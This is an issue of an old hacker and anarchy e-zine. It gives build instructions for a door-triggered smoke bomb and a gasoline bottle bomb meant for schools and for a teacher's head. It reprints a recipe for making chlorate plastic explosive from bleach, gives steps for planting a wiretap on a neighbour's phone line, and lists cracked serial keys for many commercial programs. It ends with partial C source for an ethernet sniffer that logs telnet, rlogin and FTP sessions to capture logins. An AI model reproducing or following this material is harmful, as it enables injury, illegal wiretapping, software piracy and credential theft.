############################################################\##@@@@@@@@@@@@@@@@@ Riot Freedom Hacks @@@@@@@@@@@@@@@@@@@@##\
############################################################\

Welcome to Issue 2 of Riot Freedom Hacks. 
Those of you who have read the first issue will remember that I dont claim to be a hacker cracker or a phreak.. well ok so im a phreak.. what are you gonna do about it? hehe
ok well on with the show.
Warning: I would like to remind you that this document relates to topics which are of a mature nature. so if me speaking my mind BOTHERS you FUCK OFF!

This document is not for:
-The light hearted
-people with ulsurs
-Jocks
-sphincter types with no sense of humor
-FBI or any government agency (since i am not a citizen of the USA i could care less what the Fuckin Beasty Idiots think of me.) 

ok well as in last issue i didnt write some of this stuff and the people who did should get due credit for it so at the end of each document if the author posted their name i will continue to post their name so that they recieve the credit they deserve. 

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@@@@@                                              Contents                                                   @@@@@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
                        organised into chapters, seperated by my lovely ascii art.
          -Topic-
          1. Anti-School & Anarchy
          2. Phreaking (only boxes in this issue)
          3. Kracking & Hacking
          4. XXX passwords (not verified so if they dont work its not my fault)

@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Note: this issue might turn out to be smaller than the last. 
         If you are interested in writing articles for this zine or distributing it on your BBS, Hotline, FTP server, or web page please send be an email at pbot1@hotmail.com

        I like most people are poor so if you need advertisment of sites or products please send me an email and we will talk about shit.

{NOTE TO YOU } I respond to ALL mail sent to me.(unless its just crap) so be patient if you send me a mail and it isnt replied to in a few days.)

%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%
%%%%                                          Anti-School & Anarchy                                        %%%%
%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%

In the last issue we disgussed how to fuck up your school. In this issue we will do More of the same. :) just cause its fun to make your teachers and principal look like morons. (cause, well,, they are!) not to mention Jocks.

This first tool is mostly for those Dumbass jocks.. (you know the ones im talkin about.. they call you a geek and push you around actin all tough.. then when you mop the floor with them they get even more pushy and tough and get some of their friends,, they prolly threaten you with knives or guns and shit... you can catch them jerkin each other off in the locker room before and after gym class.)

********         The High School Locker Smoke Bomb                                       ********

        This is a really nice one. Allright here's a list of the materials you
will need for this project.

1) 1 Smoke Bomb (Either Manufactured with fuse or homemade w/ fuse (explained
later))
2) 1 Model Rocket Starter. I beleive the correct term is squib or something
like that.
3) 1 Battery. Preferably Lantern.
4) 1 Wire
5) 1 Reverse Switch (When deppressed it is off, when up it is on)
6) Two Alligator Clips

                               Alligator Clips = C
B                                     |
u                                     v       Fuse
t --> 0---\                                     |
t      \   \                         /C         |
o       \___\______________________/   ``       v
n      /     /                     \     ````` ----|||||
      +    -           ^             \C ``         |   |
     ||||||||          |                  ^        |   |
     |Lantern          |                  |        |||||
     |Battery          |                  |          ^
     |      |         Wire              Squib        |
     ||||||||                                        |
                                                  Smoke Bomb



        Ok, Hopefully you'll be able to understand that. What you do is place
the button so it is up against the door and depressed. When the door is opened,
the button goes up, the current is turned on, the squid heats up, lights the
fuse, and your smoke bomb is ignited. Voila. If you really hate the fucker,
Make the squib thing light a model rocket engine (out of the rocket) instead of
a Smoke Bomb. Those things go crazy when you just light em. Have fun with this
one.
 
>>>><<<< {Authors note}  thanks to the guys at pha for supplying us with this doc.

                                The Bottle Bomb

        This is an easy bomb to make, and a highly used/effective one.  What
you need:

1) Glass Bottle
2) Gasoline
3) Potassium Permangante

        Take your glass bottle and put a few drops of gasoline in it. Now cap
off the bottle and roll it around so the gas evaporates on the sides.. Now add
a few drops of the Potassium Permangante (when I say a few, I mean like three
or four, for both the gas and PP) This Bomb can be detonated simply by throwing
it at a solid object (ie. a wall, a car, a teacher's head etc..)
Simple, eh?

>>>><<<< (pha again)

straight anarchy now.. i suppose you can apply this to your school.. if you want to blow it up or something. 

>>>><<<<

Making Plastic Explosives from Bleach           by The Jolly Roger

Potassium chlorate is an extremely volatile explosive compound, 
and has been used in the past as the main explosive filler in 
grenades, land mines, and mortar rounds by such countries as 
France and Germany.  Common household bleach contains a small 
amount of potassium chlorate, which can be extracted by the 
procedure that follows.

First off, you must obtain:

[1]  A heat source (hot plate, stove, etc.)
[2]  A hydrometer, or battery hydrometer
[3]  A large Pyrex, or enameled steel container (to weigh 
     chemicals)
[4]  Potassium chloride (sold as a salt substitute at health and 
     nutrition stores)

Take one gallon of bleach, place it in the container, and begin 
heating it.  While this solution heats, weigh out 63 grams of 
potassium chloride and add this to the bleach being heated.  
Constantly check the solution being heated with the hydrometer, 
and boil until you get a reading of 1.3.  If using a battery 
hydrometer, boil until you read a FULL charge.

Take the solution and allow it to cool in a refrigerator until it 
is between room temperature and 0 degrees Celcius.  Filter out the 
crystals that have formed and save them.  Boil this solution again 
and cool as before.  Filter and save the crystals.

Take the crystals that have been saved, and mix them with 
distilled water in the following proportions:  56 grams per 100 
milliliters distilled water.  Heat this solution until it boils 
and allow to cool.  Filter the solution and save the crystals that 
form upon cooling.  This process of purification is called 
"fractional crystalization".  These crystals should be relatively 
pure potassium chlorate.

Powder these to the consistency of face powder, and heat gently to 
drive off all moisture.

Now, melt five parts Vaseline with five parts wax.  Dissolve this 
in white gasoline (camp stove gasoline), and pour this liquid on 
90 parts potassium chlorate (the powdered crystals from above) 
into a plastic bowl.  Knead this liquid into the potassium 
chlorate until intimately mixed.  Allow all gasoline to evaporate.

Finally, place this explosive into a cool, dry place.  Avoid 
friction, sulfur, sulfides, and phosphorous compounds.  This 
explosive is best molded to the desired shape and density of 1.3 
grams in a cube and dipped in wax until water proof.  These block 
type charges guarantee the highest detonation velocity.  Also, a 
blasting cap of at least a 3 grade must be used.

The presence of the afore mentioned compounds (sulfur, sulfides, 
etc.) results in mixtures that are or can become highly sensitive 
and will possibly decompose explosively while in storage.  You 
should never store homemade explosives, and you must use EXTREME 
caution at all times while performing the processes in this 
article. 

You may obtain a catalog of other subject of this nature by 
writing:

     Information Publishing Co.
     Box 10042
     Odessa, Texas  79762


                                                       -= Exodus =-
                                                            '94
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@/////////////////                       Phreaking                       \\\\\\\\\\\\\\\\\\\\\\@
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@

Last issue we explored the wonder of Phreaking, none of the utilities involved. just plain old basics.. well in this issue I will begin to give you some of the plans for phreak "Boxes". But before I start throwing plans at you im going to tell you what a phreak "Box" is. 
Well a phreak Box is not really a box at all. Its Circutry contained in a box (could be anything.) the box is only to provide a compact neat place to keep the wires circutry diodes and Converters.
ok well now you have my crappy definition of a phreak box. here are some boxes. but first a list of most (if not all) currently used boxes.

>>>><<<<
Boxes and what they do.
-Box color- - what it does, what it is-
-Acrylic      Steal Three-Way-Calling, Call Waiting and programmable
	     Call Forwarding on old 4-wire phone systems
-Aqua         Drain the voltage of the FBI lock-in-trace/trap-trace
-Beige        Lineman's hand set
-Black        Allows the calling party to not be billed for the call
	     placed
-Blast        Phone microphone amplifier
-Blotto       Supposedly shorts every fone out in the immediate area
-Blue         Emulate a true operator by seizing a trunk with a 2600hz
	     tone
-Brown        Create a party line from 2 phone lines
-Bud          Tap into your neighbors phone line
-Chartreuse   Use the electricity from your phone line
-Cheese       Connect two phones to create a diverter
-Chrome       Manipulate Traffic Signals by Remote Control
-Clear        A telephone pickup coil and a small amp use to make free
	     calls on Fortress Phones
-Color        Line activated telephone recorder
-Copper       Cause crosstalk interference on an extender
-Crimson      Hold button
-Dark         Re-route outgoing or incoming calls to another phone
-Dayglo       Connect to your neighbors phone line
-Divertor     Re-route outgoing or incoming calls to another phone
-DLOC         Create a party line from 2 phone lines
-Gold         Trace calls, tell if the call is being traced, and can
	     change a trace
-Green        Emulate the Coin Collect, Coin Return, and Ringback tones
-Infinity     Remotely activated phone tap
-Jack         Touch-Tone key pad
-Light        In-use light
-Lunch        AM transmitter
-Magenta      Connect a remote phone line to another remote phone line
-Mauve        Phone tap without cutting into a line
-Neon         External microphone
-Noise        Create line noise
-Olive        External ringer
-Party        Create a party line from 2 phone lines
-Pearl        Tone generator
-Pink         Create a party line from 2 phone lines
-Purple       Telephone hold button
-Rainbow      Kill a trace by putting 120v into the phone line (joke)
-Razz         Tap into your neighbors phone
-Red          Make free phone calls from pay phones by generating
	     quarter tones
-Rock         Add music to your phone line
-Scarlet      Cause a neighbors phone line to have poor reception
-Silver       Create the DTMF tones for A, B, C and D
-Static       Keep the voltage on a phone line high
-Switch       Add hold, indicator lights, conferencing, etc..
-Tan          Line activated telephone recorder
-Tron         Reverse the phase of power to your house, causing your
	     electric meter to run slower
-TV Cable     "See" sound waves on your TV
-Urine        Create a capacitative disturbance between the ring and
	     tip wires in another's telephone headset
-Violet       Keep a payphone from hanging up
-White        Portable DTMF keypad
-Yellow       Add an extension phone
>>>><<<<
I hope that helps. 
>>>><<<<
+---------------------------------------------------------------+
|     You have received this information courtesy of .neXus. We do            |
|     not claim to be hackers, phreaks, pirates, traitors, etc. We               |
|     only believe that an alternative to making certain info/ideas            |
|     illegal as a means to keep people from doing bad things - is              | 
|     make information free, and educate people how to handle free           |
|     information responsibly. Please think and act responsibly.                 |
|     Don't get cockey, don't get pushy. There is always gonna be                |
|     someone out there that can kick your ass. Remember that.                  |
|                                                                                                                 |
|                 Keep the net connected......... - .gKo.                                           |
+----------------------------------------------------------------+



------- 
TAN BOX 
-------

------------ 

Introduction 

------------


The Tan box allows you to make recordings from a phone line,  and it  will  only record once the victim's phone is picked up. Basically, this is a modified linesman's  handset,  or  "Beige  Box."
For  a copy of the Beige Box file, ask your friendly local sysop.
A Beige Box consists of a speaker and two wires, a red (ring) and
a  green  (tip).  The Tan 2 minute(s) remaining Box also works on
this principle.

------------ 
Construction 
------------

Parts:

1 - small cassette recorder, preferably a micro cassette  record-
    er. (It MUST have both a microphone jack and a remote jack)

1 - single line recording control. 
    (Radio Shack part number 43-228)

2 - alligator clips 
    (Radio Shack number 270-374)

1 - plastic box to contain the above parts 
    (also available at Radio Shack) 

Tan or Black spray paint 7/16 inch hex driver

1.  Take the recording control and  cut  the  modular  plug  off.
    Make sure you leave enough wire!  

2.  Strip the red and green wires (The yellow and black wires are 
    not necessary, and can be removed). 

3.  Drill a hole on  the  end of the plastic box (enough for  two
    wires to go through).  

4.  Put the recording control in the box and run the red and 
    green wires through the hole. Attach one alligator clip to 
    each of the wires.   

5.  Put the micro cassette recorder in the box and plug the 
    remote and microphone wires from the  recording  control into  
    it.   

6.  Close the box.  

7.  Spray paint the box and wires to make it look like it is sup-
    posed to be where it is.  (BE SURE YOU LABEL THE WIRES BEFORE  
    YOU PAINT THEM!)

------------ 
Installation 
------------

You can either hook it up to the box on the side of  their  house
or  a  bridging head.  Use the 7/16" hex driver to open either of
these.  (On older houses, you may not have to use a hex  driver.)
Attach  the  red  wire to the right terminal and the green to the
left.  (Remember: Red-Ring-Right)  If you attached the box  to  a
bridging  head, there may be room to leave it inside.  If you at-
tached it to the side of a house, run the wires out of their  box
and  close  it.   Attach  the Tan Box to the side of their house.
Make sure you come back and get the box pretty soon, or  you  may
find it gone!  Micro cassette recorders are not cheap!

Be careful, wiretapping is a felony (2-20 years, a $10,000  fine,
or  both),  and various other laws may be broken (i.e., recording
without the other party knowing it, etc.)

----------------------------------- 
Ways to avoid being Beige/Tan Boxed 
-----------------------------------

A tap detector may be purchased at Radio Shack (of  course).   If
you  do detect a tap, find the box, and you will have just gotten
a new tape recorder!

+++EOF

>>>><<<<
Hmm.. that was bigger than i thought.. i think we will stick with it for now.
>>>><<<<
Where can I get a 6.5536Mhz crystal? you ask. 

Your best bet is a local electronics store.  Radio Shack sells them,
but they are overpriced and the store must order them in.  This takes
approximately two weeks.  In addition, many Radio Shack employees do
not know that this can be done.

Or, you could order the crystal mail order.  This introduces Shipping
and Handling charges, which are usually much greater than the price of
the crystal.  It's best to get several people together to share the
S&H cost.  Or, buy five or six yourself and sell them later.  Some of
the places you can order crystals are:

Digi-Key
701 Brooks Avenue South
P.O. Box 677
Thief River Falls, MN 56701-0677
(80)344-4539
Part Number:X415-ND    /* Note: 6.500Mhz and only .197 x .433 x .149! */
Part Number:X018-ND

JDR Microdevices:
2233 Branham Lane
San Jose, CA 95124
(800)538-5000
Part Number: 6.5536MHZ

Tandy Express Order Marketing
401 NE 38th Street
Fort Worth, TX 76106
(800)241-8742
Part Number: 10068625
>>>><<<<
If Radio Shack doesnt help you with your phreaking needs that is an alternative.

                                            Kracking & Hacking                                                   


I am still learning how to Krack so I wont post anything till i have tested it. I will however list kracks for some programs.
Hacking is as usual. i will post some stuff.

>>>><<<<

4 Elements (RayDream Studio)
4E-100-1801-22085

A-10 Attack
1662946582

Adrenaline Charts & Numbers
CH5598-DV-3373-MX     (Charts)
NB3897-MD-8744-MP    (Numbers )    

Astound v2.0
3058635267

DFinder v1.5.1
Name     MoonDark
Keyword     N33960D16158

DragThing v2.0
DT2-014569-CMRN85I

ChainGang
0400577890BBA3

Chromatica
CCA-100-0001-000711219514

Claris FileMaker Pro v4.0
1-9014-1162-2607-8043

ClarisWorks v5.0
0010014225

ColorTune 3 PRO
2830011000083056

Commotion v1.0.1 
XXXXXXXXSXXFXXXXX
X is any number between 1-9.  9th number is letter S, 12th number is letter F

Discribe v2.0.1 
5005569

Desktopper v1.0b1
Registration Code      68806

DiskEssentials v1.06
XXXX-XXXXXX   ( X is any number between 1-9)

DragThing v2.0
DT2-014569-CMRN85I

Email Merge v1.4
Name     MoonDark
Code     1812291787

epsConverter
PA04-6722-HE19-7695-NGGD-RK79

Exposure Pro v2.01
302056-89ABC-313

Extensis Preflight Designer v1.0.1
XMU-100-100-100-017909

F/A-18 Hornet
116-27-9820

FastTrack Schedule v5.0
Serial #     6234567012096
Key Code     6000012016076
Users     19121

FaxSTF v3.2.5 
AB132398

File Buddy v4.3
FB4-03034-2531352439-4206

Harry v1.0.0
Licensee Name     MoonDark
No. of Copies     999
License Code     BKPBMJAL

Hotline Client v1.2 
Name: Hotline 1.2           Pass: UZWFSVCSOGWIUC
Name: [k]rack Works      Pass: XKSVPSCATQOSMD

Hotline Server v1.2 GM 
Name: [k]rack Works       Pass: FIWRMMKEDFHDOD

HTML Renamer v1.21
Email      moondark@nop.com
Key     883521127

iCount v1.1a
Name     MoonDark
Code     12846

InfoGenie v2.0
IG2-010-036-562-622

Inspiration v4.1c
Name     MoonDark
Company     NOP
Serial Number     1231d6734h2352

Ircle 
v3.0b9r4   6909-8344-1490
v3.0b9   8633-9474-1461     6909-8344-1490     6620-4768-1583

iSearch v1.0
Name     MoonDark
Code     12846

iView v2.7
Name      MoonDark
Code     12947

Look Mom, No Hands v1.2
To register, hold down the control key and the mouse button during startup, it will disable some extensions and control panels, but after loading, you get the "Now Registered" message.  Now restart you computer.

MacPrefect v3.0
2234567890

Mathcad Plus 6 
MP610611D00084

MegaPhone v2.0
Activation Code: 03599055252504509062

Menuette v2.0.2 
912089680317

MultiTimer v2.1.4
Name     MoonDark
Registration Code     732774649

Musashi v2.0.5
Owner Name     MoonDark
Registration Code     1234-5678-90A-BY64

Navigator Button Editor v1.3.2
Open the About Box and type "zaphodbeeblebrox"

NetScrawl v1.0 
Name       [k]rack Works 
Pass     FXXEBGMHWIMROD

OmniPage Lite (PaperPort OEM version)
2801 A-C00-916513

Painting v1.1
Name     MoonDark
Registration Number      PNtG-5F3F-67V4-2Z0Z

PhotoQuest v2.5.3E
Name     MoonDark
Phone     5554312
Identity     NOP
Serial Number     dcgc-lhgp-nobo-eifa

PhotoVista
Serial #     2004043
Activation Code     9rpr8x-&a$aca-51b115

PictureBank Lite v3.0.1
Name     MoonDark
Registration Code     PBLT-5365-2857

Pixel Putty v2.0
PP-001-3689-A 

Practica Musica v3.6
400757

Private File v2.0
PVTA-810-010000

QuickMail Pro Client
NT7TG9RP3DGWR7S6  (Mac)
NT7TG9RP3DGWR7S6  (Win)
JV268NME3Z626  (Win95)

QuickMail Pro Server
JV8NYNMS3Z626  (WinNT) 
ABJT2XLYCTRJ26  (Mac)

QuickNailer v1.3.3b24
Registration Code: 408495107

Real PC v1.0
3100-0000-4172-2233

RenderBoy v1.2
Name     MoonDark
Registration Code     229414

Sound Icon Maker v1.01
Name     MoonDark
Validation Code      ugfddqfu

SpellCatcher v1.5.8
SC144444SPC4506

Starry Night Deluxe v2.1.3
AX12345-80738    AX23456-12447   AX34567-34154   AX45678-55861   AX56789-77568    AX67890-21076

StuffIt Deluxe v4.5
DLXA-838-254215

Super Mac Freecell v1.5
Name     MoonDark
Serial Number     9991499111

TestTrack v1.5
Multi User License     MR0188257189BIDS
Evaluation Licenses    EV1A55739000BFGD     MU12B4567995ADD5

>>>><<<<
thats a list of kracks.. sorry about the colour.
>>>><<<<
I have decided to replace the documents pretaining to hacking with the source code for a sniffer. 
>>>><<<<

Here is source code for an ethernet sniffer:

/* Esniff.c */

#include <stdio.h>
#include <ctype.h>
#include <string.h>

#include <sys/time.h>
#include <sys/file.h>
#include <sys/stropts.h>
#include <sys/signal.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/ioctl.h>

#include <net/if.h>
#include <net/nit_if.h>
#include <net/nit_buf.h>
#include <net/if_arp.h>

#include <netinet/in.h>
#include <netinet/if_ether.h>
#include <netinet/in_systm.h>
#include <netinet/ip.h>
#include <netinet/udp.h>
#include <netinet/ip_var.h>
#include <netinet/udp_var.h>
#include <netinet/in_systm.h>
#include <netinet/tcp.h>
#include <netinet/ip_icmp.h>

#include <netdb.h>
#include <arpa/inet.h>

#define ERR stderr

char    *malloc();
char    *device,
        *ProgName,
        *LogName;
FILE    *LOG;
int     debug=0;

#define NIT_DEV     "/dev/nit"
#define CHUNKSIZE   4096        /* device buffer size */
int     if_fd = -1;
int     Packet[CHUNKSIZE+32];

void Pexit(err,msg)
int err; char *msg;
{ perror(msg);
  exit(err); }

void Zexit(err,msg)
int err; char *msg;
{ fprintf(ERR,msg);
  exit(err); }

#define IP          ((struct ip *)Packet)
#define IP_OFFSET   (0x1FFF)
#define SZETH       (sizeof(struct ether_header))
#define IPLEN       (ntohs(ip->ip_len))
#define IPHLEN      (ip->ip_hl)
#define TCPOFF      (tcph->th_off)
#define IPS         (ip->ip_src)
#define IPD         (ip->ip_dst)
#define TCPS        (tcph->th_sport)
#define TCPD        (tcph->th_dport)
#define IPeq(s,t)   ((s).s_addr == (t).s_addr)

#define TCPFL(FLAGS) (tcph->th_flags & (FLAGS))

#define MAXBUFLEN  (128)
time_t  LastTIME = 0;

struct CREC {
     struct CREC *Next,
                 *Last;
     time_t  Time;              /* start time */
     struct in_addr SRCip,
                    DSTip;
     u_int   SRCport,           /* src/dst ports */
             DSTport;
     u_char  Data[MAXBUFLEN+2]; /* important stuff :-) */
     u_int   Length;            /* current data length */
     u_int   PKcnt;             /* # pkts */
     u_long  LASTseq;
};

struct CREC *CLroot = NULL;

char *Symaddr(ip)
register struct in_addr ip;
{ register struct hostent *he =
      gethostbyaddr((char *)&ip.s_addr, sizeof(struct in_addr),AF_INET);

  return( (he)?(he->h_name):(inet_ntoa(ip)) );
}

char *TCPflags(flgs)
register u_char flgs;
{ static char iobuf[8];
#define SFL(P,THF,C) iobuf[P]=((flgs & THF)?C:'-')

  SFL(0,TH_FIN, 'F');
  SFL(1,TH_SYN, 'S');
  SFL(2,TH_RST, 'R');
  SFL(3,TH_PUSH,'P');
  SFL(4,TH_ACK, 'A');
  SFL(5,TH_URG, 'U');
  iobuf[6]=0;
  return(iobuf);
}

char *SERVp(port)
register u_int port;
{ static char buf[10];
  register char *p;

   switch(port) {
     case IPPORT_LOGINSERVER: p="rlogin"; break;
     case IPPORT_TELNET:      p="telnet"; break;
     case IPPORT_SMTP:        p="smtp"; break;
     case IPPORT_FTP:         p="ftp"; break;
     default: sprintf(buf,"%u",port); p=buf; break;
   }
   return(p);
}

char *Ptm(t)
register time_t *t;
{ register char *p = ctime(t);
  p[strlen(p)-6]=0; /* strip " YYYY\n" */
  return(p);
}

char *NOWtm()
{ time_t tm;
  time(&tm);
  return( Ptm(&tm) );
}

#define MAX(a,b) (((a)>(b))?(a):(b))
#define MIN(a,b) (((a)<(b))?(a):(b))

/* add an item */
#define ADD_NODE(SIP,DIP,SPORT,DPORT,DATA,LEN) { \
  register struct CREC *CLtmp = \
        (struct CREC *)malloc(sizeof(struct CREC)); \
  time( &(CLtmp->Time) ); \
  CLtmp->SRCip.s_addr = SIP.s_addr; \
  CLtmp->DSTip.s_addr = DIP.s_addr; \
  CLtmp->SRCport = SPORT; \
  CLtmp->DSTport = DPORT; \
  CLtmp->Length = MIN(LEN,MAXBUFLEN); \
  bcopy( (u_char *)DATA, (u_char *)CLtmp->Data, CLtmp->Length); \
  CLtmp->PKcnt = 1; \
  CLtmp->Next = CLroot; \
  CLtmp->Last = NULL; \
  CLroot = CLtmp; \
}

register struct CREC *GET_NODE(Sip,SP,Dip,DP)
register struct in_addr Sip,Dip;
register u_int SP,DP;
{ register struct CREC *CLr = CLroot;

  while(CLr != NULL) {
    if( (CLr->SRCport == SP) && (CLr->DSTport == DP) &&
        IPeq(CLr->SRCip,Sip) && IPeq(CLr->DSTip,Dip) )
            break;
    CLr = CLr->Next;
  }
  return(CLr);
}

#define ADDDATA_NODE(CL,DATA,LEN) { \
 bcopy((u_char *)DATA, (u_char *)&CL->Data[CL->Length],LEN); \
 CL->Length += LEN; \
}

#define PR_DATA(dp,ln) {    \
  register u_char lastc=0; \
  while(ln-- >0) { \
     if(*dp < 32) {  \
        switch(*dp) { \
            case '\0': if((lastc=='\r') || (lastc=='\n') || lastc=='\0') \
                        break; \
            case '\r': \
            case '\n': fprintf(LOG,"\n     : "); \
                        break; \
            default  : fprintf(LOG,"^%c", (*dp + 64)); \
                        break; \
        } \
     } else { \
        if(isprint(*dp)) fputc(*dp,LOG); \
        else fprintf(LOG,"(%d)",*dp); \
     } \
     lastc = *dp++; \
  } \
  fflush(LOG); \
}

void END_NODE(CLe,d,dl,msg)
register struct CREC *CLe;
register u_char *d;
register int dl;
register char *msg;
{
   fprintf(LOG,"\n-- TCP/IP LOG -- TM: %s --\n", Ptm(&CLe->Time));
   fprintf(LOG," PATH: %s(%s) =>", Symaddr(CLe->SRCip),SERVp(CLe->SRCport));
   fprintf(LOG," %s(%s)\n", Symaddr(CLe->DSTip),SERVp(CLe->DSTport));
   fprintf(LOG," STAT: %s, %d pkts, %d bytes [%s]\n",
                        NOWtm(),CLe->PKcnt,(CLe->Length+dl),msg);
   fprintf(LOG," DATA: ");
    { register u_int i = CLe->Length;
      register u_char *p = CLe->Data;
      PR_DATA(p,i);
      PR_DATA(d,dl);
    }

   fprintf(LOG,"\n-- \n");
   fflush(LOG);

   if(CLe->Next != NULL)
    CLe->Next->Last = CLe->Last;
   if(CLe->Last != NULL)
    CLe->Last->Next = CLe->Next;
   else
    CLroot = CLe->Next;
   free(CLe);
}

/* 30 mins (x 60 seconds) */
#define IDLE_TIMEOUT 1800
#define IDLE_NODE() { \
  time_t tm; \
  time(&tm); \
  if(LastTIME<tm) { \
     register struct CREC *CLe,*CLt = CLroot; \
     LastTIME=(tm+IDLE_TIMEOUT); tm-=IDLE_TIMEOUT; \
     while(CLe=CLt) { \
       CLt=CLe->Next; \
       if(CLe->Time <tm) \
           END_NODE(CLe,(u_char *)NULL,0,"IDLE TIMEOUT"); \
     } \
  } \
}

void filter(cp, pktlen)
register char *cp;
register u_int pktlen;
{
 register struct ip     *ip;
 register struct tcphdr *tcph;

 { register u_short EtherType=ntohs(((struct ether_header *)cp)->ether_type);

   if(EtherType < 0x600) {
     EtherType = *(u_short *)(cp + SZETH + 6);
     cp+=8; pktlen-=8;
   }

   if(EtherType != ETHERTYPE_IP) /* chuk it if its not IP */
      return;
 }

    /* ugh, gotta do an alignment :-( */
 bcopy(cp + SZETH, (char *)Packet,(int)(pktlen - SZETH));

 ip = (struct ip *)Packet;
 if( ip->ip_p != IPPROTO_TCP) /* chuk non tcp pkts */
    return;
 tcph = (struct tcphdr *)(Packet + IPHLEN);

 if(!( (TCPD == IPPORT_TELNET) ||
       (TCPD == IPPORT_LOGINSERVER) ||
       (TCPD == IPPORT_FTP)
   )) return;

 { register struct CREC *CLm;
   register int length = ((IPLEN - (IPHLEN * 4)) - (TCPOFF * 4));
   register u_char *p = (u_char *)Packet;

   p += ((IPHLEN * 4) + (TCPOFF * 4));

 if(debug) {
  fprintf(LOG,"PKT: (%s %04X) ", TCPflags(tcph->th_flags),length);
  fprintf(LOG,"%s[%s] => ", inet_ntoa(IPS),SERVp(TCPS));
  fprintf(LOG,"%s[%s]\n", inet_ntoa(IPD),SERVp(TCPD));
 }

   if( CLm = GET_NODE(IPS, TCPS, IPD, TCPD) ) {

      CLm->PKcnt++;

      if(length>0)
        if( (CLm->Length + length) < MAXBUFLEN ) {
          ADDDATA_NODE( CLm, p,length);
        } else {
          END_NODE( CLm, p,length, "DATA LIMIT");
        }

      if(TCPFL(TH_FIN|TH_RST)) {
          END_NODE( CLm, (u_char *)NULL,0,TCPFL(TH_FIN)?"TH_FIN":"TH_RST" );
      }

   } else {

      if(TCPFL(TH_SYN)) {
         ADD_NODE(IPS,IPD,TCPS,TCPD,p,length);
      }

   }

   IDLE_NODE();

 }

}

/* signal handler
 */
void death()
{ register struct CREC *CLe;

    while(CLe=CLroot)
        END_NODE( CLe, (u_char *)NULL,0, "SIGNAL");

    fprintf(LOG,"\nLog ended at => %s\n",NOWtm());
    fflush(LOG);
    if(LOG != stdout)
        fclose(LOG);
    exit(1);
}

/* PLEASE TURN TO THE NEXT PAGE OR OPEN THE NEXT FILE which is "RFH2 volume2.txt" */
